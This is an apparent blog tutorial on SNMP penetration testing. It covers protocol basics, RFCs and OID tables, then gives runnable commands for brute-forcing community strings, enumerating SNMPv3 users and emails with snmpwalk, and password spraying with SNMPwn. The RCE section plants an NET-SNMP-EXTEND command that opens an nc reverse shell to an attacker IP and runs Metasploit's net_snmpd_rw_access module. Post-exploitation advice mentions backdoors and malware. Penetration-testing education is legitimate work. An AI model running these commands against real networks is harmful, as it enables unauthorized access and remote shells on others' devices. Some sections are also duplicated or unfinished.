SNMP penetration testing is a process for scanning networks and testing for vulnerabilities in Simple Network Management Protocol.

Through this process, security teams can conduct comprehensive security assessments and analyses on SNMP-enabled devices, ensuring secure networks and compliance with relevant regulations.

Introduction

SNMP (Simple Network Management Protocol) is a protocol used for network management and monitoring.

It allows network administrators to monitor network devices, including servers, routers, switches, printers, and other devices, and collect information such as device uptime, CPU usage, memory usage, and network traffic statistics.

SNMP uses a hierarchical structure called the Management Information Base (MIB) to organize and manage the data that is collected from network devices.

SNMP Components

SNMP is composed of three main components:

  1. SNMP manager
  2. SNMP agent
  3. MIBs
  4. Traps

The SNMP manager is a network management system that monitors and controls SNMP-enabled devices.

The SNMP agent is software that runs on the SNMP-enabled device and provides information to the SNMP manager.

SNMP MIBs

MIBs are typically structured as a tree-like hierarchy, with each node in the tree representing a different aspect of the device being monitored.

The top level of the MIB hierarchy is known as the root node, and subsequent levels of the hierarchy are defined by different organizations.

SNMP Communities Strings

SNMP is typically configured with one or more community strings, which are used to authenticate and authorize SNMP requests.

There are two types of community strings:

  1. read-only (RO)
  2. read-write (RW)

RO community strings allow SNMP requests to retrieve information from the SNMP-enabled device, while RW community strings allow SNMP requests to modify information on the SNMP-enabled device.

SNMP Versions

SNMP has several versions, including SNMPv1, SNMPv2, and SNMPv3.

SNMPv1 and SNMPv2

SNMPv1 and SNMPv2 do not provide any authentication or encryption mechanisms, making them susceptible to eavesdropping, tampering, and replay attacks.

SNMPv3

SNMPv3 provides authentication and encryption mechanisms, but can still be vulnerable to misconfigurations that allow attackers to bypass these security measures.

Traps

A Trap is an asynchronous notification sent by an SNMP agent to an SNMP manager. It informs the manager about specific events, such as critical errors or status changes.


SNMP (Simple Network Management Protocol) communication is structured around Protocol Data Units (PDUs), encompassing various types.

PDUs serve as the fundamental data units facilitating communication between SNMP managers and agents.

These PDU types play distinct roles in conveying information, including queries, responses, and notifications, contributing to the effective monitoring and management of network devices.

SNMP RFCs

Please note that there are more RFCs related to SNMP, and you may want to refer to official RFC repositories for the complete list.

RFC NumberTitle
RFC 1155Structure and Identification of Management Information for TCP/IP-based Internets
RFC 1157Simple Network Management Protocol (SNMP)
RFC 1212Concise MIB Definitions
RFC 1213Management Information Base for Network Management of TCP/IP-based internets: MIB-II
RFC 1901Introduction to Community-based SNMPv2
RFC 1905Protocol Operations for Version 2 of the Simple Network Management Protocol (SNMPv2)
RFC 1906Transport Mappings for SNMPv2
RFC 1907Management Information Base for Version 2 of the Simple Network Management Protocol (SNMPv2)
RFC 3411An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks
RFC 3412Message Processing and Dispatching for the Simple Network Management Protocol (SNMP)
RFC 3413Simple Network Management Protocol (SNMP) Applications
RFC 3414User-based Security Model (USM) for version 3 of the Simple Network Management Protocol (SNMPv3)
RFC 3415View-based Access Control Model (VACM) for the Simple Network Management Protocol (SNMP)
RFC 3416Version 2 of the Protocol Operations for the Simple Network Management Protocol (SNMPv2)
RFC 3417Transport Mappings for the Simple Network Management Protocol (SNMP)
RFC 3418Management Information Base (MIB) for the Simple Network Management Protocol (SNMP)
RFC 3584Coexistence between Version 1, Version 2, and Version 3 of the Internet-standard Network Management Framework

SNMP Penetration Testing

Start the assessment for SNMP penetration testing by first identifying the target SNMP-enabled devices within the network.

Next, gather relevant information like SNMP versions, community strings, and device configurations.

Then, perform vulnerability scanning and enumeration to identify potential weaknesses and misconfigurations.

Finally, leverage specialized tools and techniques to exploit identified vulnerabilities and assess the overall security of the SNMP implementation.

SNMP Reconnaissance

Identify the SNMP services running on the target system(s) using tools like Nmap.

Determine the SNMP version being used (v1, v2c, or v3), as well as the community strings and other SNMP configurations.

Use Nmap to identify SNMP services running on a target system using the following command: 

sudo nmap -sU -sV <target-ip>

SNMP (Simple Network Management Protocol) uses two ports for communication:

  • UDP port 161
  • UDP port 162

UDP port 161 is used by SNMP managers to send requests to SNMP agents on network devices.

SNMP agents listen on port 161 for incoming SNMP requests.

When a request is received, the agent processes the request and sends a response back to the manager on the same port.

UDP port 162 is used by SNMP agents to send SNMP traps to SNMP managers.

SNMP traps are notifications that are sent by the agent to the manager to indicate an event or error condition, such as a device going down or reaching a certain threshold for a particular metric.

SNMP Enumeration

SNMP enumeration is the process of remotely querying a device to extract its management data, such as names of users, shares, and services.

With this information, an attacker can further exploit a network by having access to confidential data and elevated privileges.

Use SNMP enumeration tools like nmap, msfconsole, or snmpwalk to gather information such as system details, user accounts, communities, network topology, and SNMP object identifiers (OIDs). 

nmap -sU -p 161 --script snmp-* <target-ip>
SNMP Penetration Testing

Nmap scan shows us the EngneID we should save it we case the device only accepts SNMP v3. 

snmpwalk -v 2c -c public 192.168.1.233 system
SNMP Penetration Testing

At the moment we have nothing, we know the service SNMP is running the device answers to nothing, not even using the custom default community string “public”.

What can we do?

Brute Force Community Strings

There are many tools to do the job but I will list the most common ones.

ToolCommand
Nmapnmap -sU –script snmp-brute 192.168.1.233 –script-args snmp-brute.communitiesdb=<wordlist>
Metasploitmsf> use auxiliary/scanner/snmp/snmp_login
Hydrahydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.233 snmp
Onesixtyoneonesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.1.233
SNMP Hacking Tools

For our test, Nmap and a custom communities wordlist were used. For this attack to work the keyword related to the community must be inside the wordlist file. (I add it manually) 

nmap -sU -p 161 --script snmp-brute 192.168.1.233 --script-args snmp-brute.communitiesdb=/home/rfs/Downloads/common-snmp-community-strings.txt
SNMP Penetration Testing

Has we can see, Nmap found a valid community with the name poplabsec, now we can use it with snmpwalk. 

snmpwalk -v 2c -c poplabsec 192.168.1.233 system
SNMP Enumeration

Great is now possible to read information on the remote system using SNMP v1 or v2. 

snmpwalk -v 2c -c poplabsec 192.168.1.233 .1 | grep -i "trap"

Enumerate SNMP v3 Users

Here we are reading the SNMP v3 users inside the system using SNMP v2. 

snmpwalk -v 2c -c poplabsec 192.168.1.233  .1.3.6.1.6.3.15.1.2.2.1.3
SNMP Penetration Testing

Enumerate Emails 

snmpwalk -v 2c -c poplabsec 192.168.1.233 .1 | grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"
SNMP Penetration Testing

Windows OIDs

Object Identifiers (OIDs) within the SNMP framework play a pivotal role in identifying and managing specific aspects of Windows environments.

These OIDs act as unique numerical labels assigned to various parameters, enabling cyber security practitioners and network administrators to gather crucial data related to system information, network interfaces, TCP/IP statistics, disk details, and memory metrics.

CategoryOIDDescription
System Information1.3.6.1.2.1.1.1.0System Description
System Information1.3.6.1.2.1.1.3.0System Uptime
System Information1.3.6.1.2.1.1.4.0System Contact
System Information1.3.6.1.2.1.1.5.0System Name
System Information1.3.6.1.2.1.1.6.0System Location
Network Interfaces1.3.6.1.2.1.2.2IfTable
Network Interfaces1.3.6.1.2.1.2.2.1.2Interface Description
Network Interfaces1.3.6.1.2.1.2.2.1.8Interface Status
Network Interfaces1.3.6.1.2.1.2.2.1.5Interface Speed
TCP/IP Statistics1.3.6.1.2.1.6.10.0TCP Inbound Segments
TCP/IP Statistics1.3.6.1.2.1.6.11.0TCP Outbound Segments
TCP/IP Statistics1.3.6.1.2.1.7.1.0UDP Inbound Datagrams
TCP/IP Statistics1.3.6.1.2.1.7.4.0UDP Outbound Datagrams
Disk Information1.3.6.1.2.1.25.2Disk Table
Disk Information1.3.6.1.2.1.25.2.3.1.5Disk Size
Disk Information1.3.6.1.2.1.25.2.3.1.6Disk Used Space
Memory Information1.3.6.1.2.1.25.2.3.1.5.1Total RAM
Memory Information1.3.6.1.2.1.25.2.3.1.6.1Free RAM

Linux OIDs

CategoryOIDDescription
System Information1.3.6.1.2.1.1.1.0System Description
System Information1.3.6.1.2.1.1.3.0System Uptime
System Information1.3.6.1.2.1.1.4.0System Contact
System Information1.3.6.1.2.1.1.5.0System Name
System Information1.3.6.1.2.1.1.6.0System Location
Network Interfaces1.3.6.1.2.1.2.2IfTable
Network Interfaces1.3.6.1.2.1.2.2.1.2Interface Description
Network Interfaces1.3.6.1.2.1.2.2.1.8Interface Status
Network Interfaces1.3.6.1.2.1.2.2.1.5Interface Speed
TCP/IP Statistics1.3.6.1.2.1.6.10.0TCP Inbound Segments
TCP/IP Statistics1.3.6.1.2.1.6.11.0TCP Outbound Segments
TCP/IP Statistics1.3.6.1.2.1.7.1.0UDP Inbound Datagrams
TCP/IP Statistics1.3.6.1.2.1.7.4.0UDP Outbound Datagrams
Disk Information1.3.6.1.2.1.25.2Disk Table
Disk Information1.3.6.1.2.1.25.2.3.1.5Disk Size
Disk Information1.3.6.1.2.1.25.2.3.1.6Disk Used Space
Memory Information1.3.6.1.2.1.25.2.3.1.5.1Total RAM
Memory Information1.3.6.1.2.1.25.2.3.1.6.1Free RAM
SNMP Penetration Testing

https://mibbrowser.online/

SNMP Vulnerability Analysis

In the process of conducting SNMP vulnerability analysis, one important step is to identify valid SNMP communities.

We can use tools like Nmap to search for valid communities, such as the one named poplabsec found in the specified communities database location.

Once a valid community is identified, it can be used with the snmpwalk command to retrieve system information from the remote host.

SNMPwn is a tool for testing SNMP configurations and identifying vulnerabilities, including weak community strings, SNMPv3 user enumeration, and default passwords. 

git clone https://github.com/hatlord/snmpwn.git
cd snmpwn
gem install bundler  
bundle install
./snmpwn.rb
SNMP Penetration Testing
SNMP Penetration Testing: A Comprehensive Guide 13
./snmpwn.rb --hosts hosts.txt --users users.txt --passlist /home/rfs/Downloads/rockyou.txt --enclist /home/rfs/Downloads/rockyou.txt
SNMP Penetration Testing
SNMP Penetration Testing: A Comprehensive Guide 14
SNMP Penetration Testing
SNMP Penetration Testing: A Comprehensive Guide 15

SNMP Exploitation

Attempt to exploit any discovered vulnerabilities.

For example, SNMPv1 and SNMPv2c use community strings for authentication, which can be easily brute-forced.

SNMPv3, on the other hand, uses more secure authentication methods, but may still be vulnerable to certain attacks.

Metasploit is another popular penetration testing framework that includes modules for exploiting SNMP vulnerabilities.

SNMP RCE

Linux Reverse Shell

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c poplabsec 192.168.1.233'nsExtendStatus."command10"' = createAndGo  'nsExtendCommand."command10"' = /usr/bin/bash 'nsExtendArgs."command10"' = ' -i "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.180 8999 >/tmp/f"'
snmpwalk -v 2c -c poplabsec 192.168.1.233 nsExtendObjects
msfconsole -q
use exploit/linux/snmp/net_snmpd_rw_access
set RHOSTS 192.168.1.233
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.1.180
exploit
sessions
sudo apt install snmp snmp-mibs-downloader rlwrap -y 
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
rlwrap python shell.py <IP> -c <community string>

Different vendors may implement SNMP in slightly different ways, leading to variations in security features and vulnerabilities.

Stay informed about specific vulnerabilities associated with the SNMP implementation of the devices in your network.

Windows Reverse Shell

Windows SNMP (Simple Network Management Protocol) Remote Code Execution (RCE) refers to a critical security vulnerability that could potentially allow unauthorized attackers to execute arbitrary code on a Windows system through the SNMP service.

Building the LAb…

SNMP Post-exploitation

If you have access to a limited user account on the system, try to escalate your privileges using SNMP.

This can be done by querying privileged OIDs or by leveraging SNMP vulnerabilities to execute arbitrary code.

Once you have gained access to the system, perform post-exploitation tasks like gathering sensitive data, creating backdoors, or installing malware.

SNMP Clean-up

Ensure that any changes made during the pen-testing process are reversed and that the system is left in its original state.

Ensure that any changes made during the pen-testing process are reversed and that the system is left in its original state.

In the next article, I will talk about more advanced features like abusing Traps to infiltrate deep into the network and attacking SNMP Managers.

For additional resources on penetration testing, you may also refer to the following articles:

What is SNMP vulnerability analysis?

SNMP vulnerability analysis is the process of assessing the security weaknesses within a network’s SNMP (Simple Network Management Protocol) implementation. It involves identifying potential vulnerabilities, misconfigurations, and weaknesses that could be exploited by an attacker to gain unauthorized access or disrupt network operations.

How is SNMP penetration testing performed?

SNMP penetration testing involves conducting controlled security assessments to identify vulnerabilities and potential attack vectors in an SNMP-enabled network. This process typically includes identifying SNMP devices, scanning for SNMP vulnerabilities, brute-forcing community strings, testing for common misconfigurations, and simulating attacks to assess the overall security posture of the SNMP implementation.

What are the benefits of SNMP penetration testing?

SNMP penetration testing offers several benefits for network engineers. It helps identify vulnerabilities and weaknesses in SNMP configurations, allowing for timely remediation to enhance the security posture of the network. By proactively testing the SNMP implementation, engineers can ensure that unauthorized access, data leaks, or service disruptions are mitigated. Additionally, SNMP penetration testing assists in evaluating compliance with industry standards and guidelines for secure network management.

https://mogwailabs.de/en/blog/2019/10/abusing-linux-snmp-for-rce/
Avatar of RFS

RFS (104)

Network Penetration Testing, Penetration Testing

Tagged in:

, , , , ,